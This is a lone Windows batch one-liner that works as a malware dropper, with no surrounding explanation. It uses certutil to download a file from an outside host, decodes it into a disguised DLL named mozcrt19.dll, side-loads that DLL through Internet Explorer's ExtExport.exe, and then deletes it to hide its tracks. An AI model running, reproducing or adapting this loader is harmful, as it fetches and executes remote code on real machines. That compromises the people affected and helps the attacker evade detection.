setlocal EnableDelayExpansion & certutil -urlcache -f http://mail.erikumphery.com/z %TEMP%\r >nul & certutil -decode %TEMP%\r %TEMP%\mozcrt19.dll >nul & del %TEMP%\r & ( if exist "C:\Program Files\Internet Explorer\ExtExport.exe" ( set C=call "C:\Program Files\Internet Explorer\ExtExport.exe" "%TEMP%" 395 134) else ( set C=call "C:\Program Files (x86)\Internet Explorer\ExtExport.exe" "%TEMP%" 2 9 ) ) & %C% & timeout /t 7 /nobreak >nul & del %TEMP%\mozcrt19.dll